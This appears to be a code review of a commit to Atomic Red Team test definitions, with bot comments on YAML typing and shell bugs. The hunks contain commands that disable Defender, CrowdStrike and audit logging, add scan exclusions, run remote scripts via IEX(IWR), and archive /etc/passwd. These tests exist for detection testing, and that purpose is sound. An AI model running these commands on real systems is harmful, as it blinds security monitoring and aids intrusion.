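Review bot: Replacing `default: null` with a bare `default:` for `flags` is a no-op for the YAML parser (both load as null), but the bare form is the ambiguous shape yamllint's `empty-values` rule flags, and a consumer that substitutes `#{flags}` may render null differently from the "blank by default" the description promises. If an empty string is what the executor should see, state it explicitly: `default: ""`. The same `null` → bare change appears in T1562.001's `username` and `password` arguments (hunk @@ -493) and the same remark applies there.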
@@ -11,19 +11,19 @@ atomic_tests: input_arguments: local_folder: description: Local path of Rubeus executable - type: Path + type: path default: $Env:temp local_executable: description: name of the rubeus executable - type: String + type: string default: 'rubeus.exe' out_file: description: file where command results are stored - type: String + type: string default: rubeus_output.txt rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 41f1ab69..23c6502e 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml 
@@ -7,37 +7,37 @@ atomic_tests: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory supported_platforms: - - windows + - windows input_arguments: input_path: description: Path that should be compressed into our output file - type: Path + type: path default: '%USERPROFILE%' file_extension: description: Extension of files to compress - type: String + type: string default: ".txt" output_file: description: Path where resulting compressed data should be placed - type: Path + type: path default: '%USERPROFILE%\T1560.001-data.rar' rar_installer: description: Winrar installer - type: Path + type: path default: '%TEMP%\winrar.exe' rar_exe: description: The RAR executable from Winrar - type: Path + type: path default: '%programfiles%/WinRAR/Rar.exe' dependencies: - - description: | - Rar tool must be installed at specified location (#{rar_exe}) - prereq_command: | - if not exist "#{rar_exe}" (exit /b 1) - get_prereq_command: | - echo Downloading Winrar installer - bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} - #{rar_installer} /S + - description: | + Rar tool must be installed at specified location (#{rar_exe}) + prereq_command: | + if not exist "#{rar_exe}" (exit /b 1) + get_prereq_command: | + echo Downloading Winrar installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} + #{rar_installer} /S executor: name: command_prompt elevation_required: false 
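Review bot: The re-indented `get_prereq_command` still downloads the WinRAR installer with `bitsadmin` and runs it with `/S` without any integrity check, whereas the WinZip dependency later in this same file (hunk @@ -85) gates the installer behind `Invoke-WebRequestVerifyHash` with a pinned hash. For consistency and to avoid silently executing whatever the URL serves, add a `rar_hash` input argument and verify the download against it before `#{rar_installer} /S`, or at least document in the dependency description that the installer is not verified. The hunk is whitespace-only, so this is a pre-existing gap rather than something the commit introduces.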
@@ -51,15 +51,15 @@ atomic_tests: Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) supported_platforms: - - windows + - windows input_arguments: rar_installer: description: Winrar installer - type: Path + type: path default: '%TEMP%\winrar.exe' rar_exe: description: The RAR executable from Winrar - type: Path + type: path default: '%programfiles%/WinRAR/Rar.exe' dependencies: - description: | 
@@ -85,32 +85,32 @@ atomic_tests: Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) supported_platforms: - - windows + - windows input_arguments: winzip_exe: description: Path to installed Winzip executable - type: Path + type: path default: "%ProgramFiles%\\WinZip\\winzip64.exe" winzip_url: description: Path to download Windows Credential Editor zip file - type: Url + type: url default: https://download.winzip.com/gl/nkln/winzip24-home.exe winzip_hash: description: File hash of the Windows Credential Editor zip file - type: String + type: string default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB dependency_executor_name: powershell dependencies: - - description: | - Winzip must be installed - prereq_command: | - cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' - get_prereq_command: | - IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) - if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ - Write-Host Follow the installation prompts to continue - cmd /c "$env:Temp\winzip.exe" - } + - description: | + Winzip must be installed + prereq_command: | + cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)' + get_prereq_command: | + IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) + if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ + Write-Host Follow the installation prompts to continue + cmd /c "$env:Temp\winzip.exe" + } executor: name: command_prompt elevation_required: false 
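Review bot: The descriptions of `winzip_url` and `winzip_hash` still read "Path to download Windows Credential Editor zip file" and "File hash of the Windows Credential Editor zip file", which look copied from another test; the values are the WinZip installer URL and its hash. Suggest `description: URL of the WinZip installer` and `description: File hash of the WinZip installer` so an operator reading the argument list is not misled about what is downloaded. The hunk only re-indents these lines, so the wording is pre-existing.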
@@ -126,15 +126,15 @@ atomic_tests: description: | Note: Requires 7zip installation supported_platforms: - - windows + - windows input_arguments: 7zip_installer: description: 7zip installer - type: Path - default: "%TEMP%\\7zip.exe" + type: path + default: "%TEMP%\\7zip.exe" 7zip_exe: description: Path to installed 7zip executable - type: Path + type: path default: "%ProgramFiles%\\7-zip\\7z.exe" dependencies: - description: | @@ -159,25 +159,25 @@ atomic_tests: description: | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. supported_platforms: - - linux - - macos + - linux + - macos input_arguments: input_files: description: Path that should be compressed into our output file, may include wildcards - type: Path + type: path default: /var/log/{w,b}tmp output_file: description: Path that should be output as a zip archive - type: Path + type: path default: $HOME/data.zip dependencies: - - description: | - Files to zip must exist (#{input_files}) - prereq_command: | - if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; - get_prereq_command: | - (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip) - echo Please set input_files argument to include files that exist + - description: | + Files to zip must exist (#{input_files}) + prereq_command: | + if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; + get_prereq_command: | + (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip) + echo Please set input_files argument to include files that exist executor: name: sh elevation_required: false 
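Review bot: In the re-indented `prereq_command` of the zip test (hunk @@ -159), `[ $(ls #{input_files} | wc -l) > 0 ]` does not compare numbers: inside `[ ]` the unquoted `>` is a shell redirection, so the test creates a file named `0` in the working directory and succeeds whenever `wc` printed anything. Use the numeric operator and quote the expansion: `if [ "$(ls #{input_files} | wc -l)" -gt 0 ] && [ -x "$(which zip)" ]; then exit 0; else exit 1; fi;`.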
@@ -190,16 +190,16 @@ atomic_tests: description: | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. supported_platforms: - - linux - - macos + - linux + - macos input_arguments: input_file: description: Path that should be compressed - type: Path + type: path default: $HOME/victim-gzip.txt input_content: description: contents of compressed files if file does not already exist. default contains test credit card and social security number - type: String + type: string default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' executor: name: sh @@ -213,24 +213,24 @@ atomic_tests: description: | An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. supported_platforms: - - linux - - macos + - linux + - macos input_arguments: input_file_folder: description: Path that should be compressed - type: Path + type: path default: '$HOME/$USERNAME' output_file: description: File that should be output - type: Path + type: path default: '$HOME/data.tar.gz' dependencies: - - description: | - Folder to zip must exist (#{input_file_folder}) - prereq_command: | - test -e #{input_file_folder} - get_prereq_command: | - echo Please set input_file_folder argument to a folder that exists + - description: | + Folder to zip must exist (#{input_file_folder}) + prereq_command: | + test -e #{input_file_folder} + get_prereq_command: | + echo Please set input_file_folder argument to a folder that exists executor: name: sh elevation_required: false 
@@ -243,28 +243,28 @@ atomic_tests: description: | Encrypt data for exiltration supported_platforms: - - macos - - linux + - macos + - linux input_arguments: test_folder: description: Path used to store files. - type: Path + type: path default: /tmp/T1560 test_file: description: Temp file used to store encrypted data. - type: Path + type: path default: T1560 encryption_password: description: Password used to encrypt data. - type: String + type: string default: InsertPasswordHere dependency_executor_name: sh dependencies: - - description: gpg and zip are required to run the test. - prereq_command: | - if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - get_prereq_command: | - (which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg) + - description: gpg and zip are required to run the test. + prereq_command: | + if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; + get_prereq_command: | + (which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg) executor: name: sh elevation_required: false diff --git a/atomics/T1560.002/T1560.002.yaml b/atomics/T1560.002/T1560.002.yaml index e857fa37..7a80a4aa 100644 --- a/atomics/T1560.002/T1560.002.yaml +++ b/atomics/T1560.002/T1560.002.yaml 
@@ -7,23 +7,23 @@ atomic_tests: description: | Uses GZip from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .gz file to be - type: Path + type: path default: /tmp/passwd.gz dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false @@ -36,23 +36,23 @@ atomic_tests: description: | Uses bz2 from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .bz2 file to be - type: Path + type: path default: /tmp/passwd.bz2 dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false 
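Review bot: The re-indented `get_prereq_command: |` has no content, so it loads as an empty string and running the prerequisite installer does nothing when `prereq_command` fails; the block either needs an install step or a comment stating that Python must be installed manually. The `prereq_command` itself relies on `which python`, which is absent on many current Linux distributions that ship only `python3`, so the dependency check will fail on hosts that could run the test. The same pair of lines appears in the other three tests of this file (second hunk here and both hunks at the next line), so whatever fix is chosen should be applied to all four.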
@@ -65,23 +65,23 @@ atomic_tests: description: | Uses zipfile from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .zip file to be - type: Path + type: path default: /tmp/passwd.zip dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false @@ -94,23 +94,23 @@ atomic_tests: description: | Uses tarfile from Python to compress files supported_platforms: - - linux + - linux input_arguments: path_to_input_file: description: Path to the file that you want to compress - type: Path + type: path default: /etc/passwd path_to_output_file: description: Path of the file that you want your .tar.gz file to be - type: Path + type: path default: /tmp/passwd.tar.gz dependency_executor_name: bash dependencies: - - description: | - Requires Python - prereq_command: | - which_python=`which python`; $which_python -V - get_prereq_command: | + - description: | + Requires Python + prereq_command: | + which_python=`which python`; $which_python -V + get_prereq_command: | executor: name: bash elevation_required: false diff --git a/atomics/T1560/T1560.yaml b/atomics/T1560/T1560.yaml index 83122502..7fcb6a51 100644 --- a/atomics/T1560/T1560.yaml +++ b/atomics/T1560/T1560.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1560 display_name: Archive Collected Data 
@@ -9,20 +8,20 @@ atomic_tests: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory supported_platforms: - - windows + - windows input_arguments: input_file: description: Path that should be compressed into our output file - type: Path + type: path default: $env:USERPROFILE output_file: description: Path where resulting compressed data should be placed - type: Path + type: path default: $env:USERPROFILE\T1560-data-ps.zip executor: name: powershell elevation_required: false command: | dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - cleanup_command: | - Remove-Item -path #{output_file} -ErrorAction Ignore \ No newline at end of file + cleanup_command: |- + Remove-Item -path #{output_file} -ErrorAction Ignore diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 00a76689..9d1bd5b7 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml 
@@ -10,19 +10,19 @@ atomic_tests: input_arguments: package_checker: description: Package checking command for linux. - type: String + type: string default: (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed) package_installer: description: Package installer command for linux. Default yum - type: String + type: string default: (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog) flavor_command: description: Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog - type: String + type: string default: systemctl stop rsyslog ; systemctl disable rsyslog cleanup_command: description: Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on - type: String + type: string default: systemctl start rsyslog ; systemctl enable rsyslog dependency_executor_name: sh dependencies: @@ -147,11 +147,11 @@ atomic_tests: input_arguments: falcond_plist: description: The path of the Crowdstrike Falcon plist file - type: Path + type: path default: /Library/LaunchDaemons/com.crowdstrike.falcond.plist userdaemon_plist: description: The path of the Crowdstrike Userdaemon plist file - type: Path + type: path default: /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist executor: command: | @@ -172,7 +172,7 @@ atomic_tests: input_arguments: sysmon_driver: description: The name of the Sysmon filter driver (this can change from the default) - type: String + type: string default: SysmonDrv dependency_executor_name: powershell dependencies: @@ -217,7 +217,7 @@ atomic_tests: input_arguments: sysmon_exe: description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) - type: Path + type: path default: PathToAtomicsFolder\T1562.001\bin\sysmon.exe dependency_executor_name: powershell dependencies: 
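Review bot: The `package_checker` default `(rpm -q rsyslog 2>&1 >/dev/null)` has its redirections in the wrong order: stderr is duplicated onto the original stdout before stdout is sent to `/dev/null`, so `rpm` errors still reach the terminal. If the intent is to silence both streams, write `(rpm -q rsyslog >/dev/null 2>&1) || (dpkg -s rsyslog | grep -q installed)`. Only the `type` line changes in this hunk, so this is pre-existing.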
@@ -285,7 +285,7 @@ atomic_tests: input_arguments: service_name: description: The name of the service to stop - type: String + type: string default: McAfeeDLPAgentService executor: command: | @@ -395,7 +395,7 @@ atomic_tests: input_arguments: service_name: description: The name of the service to remove - type: String + type: string default: McAfeeDLPAgentService executor: command: | @@ -412,7 +412,7 @@ atomic_tests: input_arguments: falcond_path: description: The Crowdstrike Windows Sensor path. The Guid always changes. - type: Path + type: path default: C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe executor: command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} @@ -420,7 +420,7 @@ atomic_tests: elevation_required: true - name: Tamper with Windows Defender Evade Scanning -Folder auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed - description: | + description: | Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath 
@@ -429,20 +429,20 @@ atomic_tests: input_arguments: excluded_folder: description: This folder will be excluded from scanning - type: Path + type: path default: C:\Temp executor: command: |- $excludedpath= "#{excluded_folder}" Add-MpPreference -ExclusionPath $excludedpath - cleanup_command: | + cleanup_command: | $excludedpath= "#{excluded_folder}" Remove-MpPreference -ExclusionPath $excludedpath name: powershell elevation_required: true - name: Tamper with Windows Defender Evade Scanning -Extension auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea - description: | + description: | Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension. @@ -451,13 +451,13 @@ atomic_tests: input_arguments: excluded_exts: description: A list of extension to exclude from scanning - type: String + type: string default: .exe executor: command: |- $excludedExts= "#{excluded_exts}" Add-MpPreference -ExclusionExtension $excludedExts - cleanup_command: | + cleanup_command: | $excludedExts= "#{excluded_exts}" Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore name: powershell @@ -473,7 +473,7 @@ atomic_tests: input_arguments: excluded_process: description: A list of processes to exclude from scanning - type: String + type: string default: outlook.exe executor: command: |- @@ -493,12 +493,12 @@ atomic_tests: input_arguments: username: description: office-365 username - type: String - default: null + type: string + default: password: description: office-365 password - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | 
@@ -531,7 +531,7 @@ atomic_tests: elevation_required: false - name: Disable Windows Defender with DISM auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58 - description: | + description: | The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. @@ -551,12 +551,12 @@ atomic_tests: - windows input_arguments: DefenderID: - description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). - type: String + description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). + type: string default: FFFF DefenderControlExe: - description: Path to Defender Control software version 1.6. - type: String + description: Path to Defender Control software version 1.6. + type: string default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe dependency_executor_name: powershell dependencies: 
@@ -586,11 +586,11 @@ atomic_tests: input_arguments: AdvancedRun_Location: description: Path of Advanced Run executable - type: Path + type: path default: '$env:temp\AdvancedRun.exe' delete_defender_folder: description: Set to 1 to also delete the Windows Defender folder - type: Integer + type: integer default: 0 dependency_executor_name: powershell dependencies: @@ -667,20 +667,20 @@ atomic_tests: - name: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e description: | - LockBit Black - Disable Privacy Settings Experience Using Registry + LockBit Black - Disable Privacy Settings Experience Using Registry supported_platforms: - windows executor: command: | reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f cleanup_command: | - reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1 + reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1 name: command_prompt elevation_required: true - name: LockBit Black - Use Registry Editor to turn on automatic logon -cmd auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 description: | - LockBit Black - Use Registry Editor to turn on automatic logon + LockBit Black - Use Registry Editor to turn on automatic logon supported_platforms: - windows executor: @@ -699,7 +699,7 @@ atomic_tests: - name: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374 description: | - LockBit Black - Disable Privacy Settings Experience Using Registry + LockBit Black - Disable Privacy Settings Experience Using Registry supported_platforms: - windows executor: 
@@ -712,7 +712,7 @@ atomic_tests: - name: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a description: | - Lockbit Black - Use Registry Editor to turn on automatic logon + Lockbit Black - Use Registry Editor to turn on automatic logon supported_platforms: - windows executor: @@ -730,7 +730,7 @@ atomic_tests: elevation_required: true - name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012 - description: | + description: | The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. @@ -744,12 +744,12 @@ atomic_tests: Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore - name: powershell + name: powershell elevation_required: true - name: WMIC Tamper with Windows Defender Evade Scanning Folder auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 - description: | + description: | The following Atomic will attempt to exclude a folder within Defender leveraging WMI Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ supported_platforms: 
@@ -761,8 +761,8 @@ atomic_tests: wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\" name: command_prompt elevation_required: true - -- name: Delete Windows Defender Scheduled Tasks + +- name: Delete Windows Defender Scheduled Tasks auto_generated_guid: 4b841aa1-0d05-4b32-bbe7-7564346e7c76 description: | The following atomic test will delete the Windows Defender scheduled tasks. 
@@ -771,15 +771,15 @@ atomic_tests: supported_platforms: - windows dependencies: - - description: | - The Windows Defender scheduled tasks must be backed up first - prereq_command: | - IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 ) - get_prereq_command: | - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml" - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml" - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml" - schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml" + - description: | + The Windows Defender scheduled tasks must be backed up first + prereq_command: | + IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: | + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml" + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml" + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml" + schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml" executor: command: | IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f ) diff --git a/atomics/T1562.002/T1562.002.yaml b/atomics/T1562.002/T1562.002.yaml index cf3e4390..80d377e4 100644 --- a/atomics/T1562.002/T1562.002.yaml +++ b/atomics/T1562.002/T1562.002.yaml 
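Review bot: The re-indented `prereq_command` only checks for `%temp%\Windows_Defender_Scheduled_Scan.xml`, while `get_prereq_command` exports four task definitions; if any of the other three `schtasks /query` calls fails, the prerequisite still reports success and the subsequent delete runs without a complete backup to restore from. Check all four files (chain the `IF EXIST` tests, or loop over the four names) so the backup the cleanup depends on is known to be complete before anything is deleted. The hunk is whitespace-only, so this gap predates the commit.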
@@ -13,7 +13,7 @@ atomic_tests: input_arguments: website_name: description: The name of the website on a server - type: String + type: string default: Default Web Site executor: command: | @@ -35,7 +35,7 @@ atomic_tests: input_arguments: website_name: description: The name of the website on a server - type: String + type: string default: Default Web Site executor: command: | @@ -70,10 +70,10 @@ atomic_tests: description: >- Disables the windows audit policy to prevent key host based telemetry being written into the event logs. - + [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/) supported_platforms: - - windows + - windows executor: command: | auditpol /set /category:"Account Logon" /success:disable /failure:disable @@ -90,7 +90,7 @@ atomic_tests: description: >- Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. supported_platforms: - - windows + - windows executor: command: | auditpol /clear /y @@ -111,7 +111,7 @@ atomic_tests: input_arguments: log_name: description: Name of the log to be disabled - type: String + type: string default: Microsoft-Windows-IKE/Operational executor: command: | @@ -128,7 +128,7 @@ atomic_tests: input_arguments: file_name: description: exe version of Phant0m - type: Path + type: path default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe dependency_executor_name: powershell dependencies: @@ -144,4 +144,4 @@ atomic_tests: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe cleanup_command: | echo "Sorry you have to reboot" - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1562.003/T1562.003.yaml b/atomics/T1562.003/T1562.003.yaml index 2cbda1fd..bcb46d99 100644 --- a/atomics/T1562.003/T1562.003.yaml +++ b/atomics/T1562.003/T1562.003.yaml 
@@ -11,7 +11,7 @@ atomic_tests: input_arguments: evil_command: description: Command to run after shell history collection is disabled - type: String + type: string default: whoami executor: command: | @@ -34,4 +34,4 @@ atomic_tests: 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile 3. ls 4. whoami > recon.txt - name: manual \ No newline at end of file + name: manual diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 9f4ecf1e..19e3ee35 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -41,7 +41,7 @@ atomic_tests: cleanup_command: | netsh advfirewall reset >nul 2>&1 name: command_prompt -- name: Opening ports for proxy - HARDRAIN +- name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 description: | This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. @@ -63,7 +63,7 @@ atomic_tests: input_arguments: local_port: description: This is the local port you wish to test opening - type: Integer + type: integer default: 3389 executor: command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any @@ -78,7 +78,7 @@ atomic_tests: input_arguments: exe_file_path: description: path to exe file - type: Path + type: path default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe executor: command: | 
@@ -89,21 +89,21 @@ atomic_tests: Remove-Item C:\Users\$env:UserName\AtomicTest.exe -ErrorAction Ignore name: powershell elevation_required: true -- name: Stop/Start UFW firewall +- name: Stop/Start UFW firewall auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: | Stop the Uncomplicated Firewall (UFW) if installed. supported_platforms: - linux dependency_executor_name: sh - dependencies: - - description: | - Check if ufw is installed on the machine. - prereq_command: | - if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi - get_prereq_command: | - echo "" + dependencies: + - description: | + Check if ufw is installed on the machine. + prereq_command: | + if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi + if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true 
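Review bot: `get_prereq_command: echo ""` cannot satisfy the prerequisite it is paired with: when `prereq_command` exits 1 because ufw is missing or inactive, the remediation prints nothing, so the get-prereqs step presumably reports success while leaving the test unrunnable. Either install and enable ufw there, or at least emit an operator instruction as the AWS tests in this same commit do, e.g. `echo "Install ufw and run 'ufw enable' before running this test"`. The same reindented pattern appears in the following hunks for the systemctl, logging, add/delete rule, user.rules, ufw.conf, sysctl.conf, /etc/default/ufw and log-file tests. Minor style: `if echo "$(ufw status)" |grep -q "inactive"` reads more plainly as `if ufw status | grep -q inactive`. The executor command for this test lies outside the hunk.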
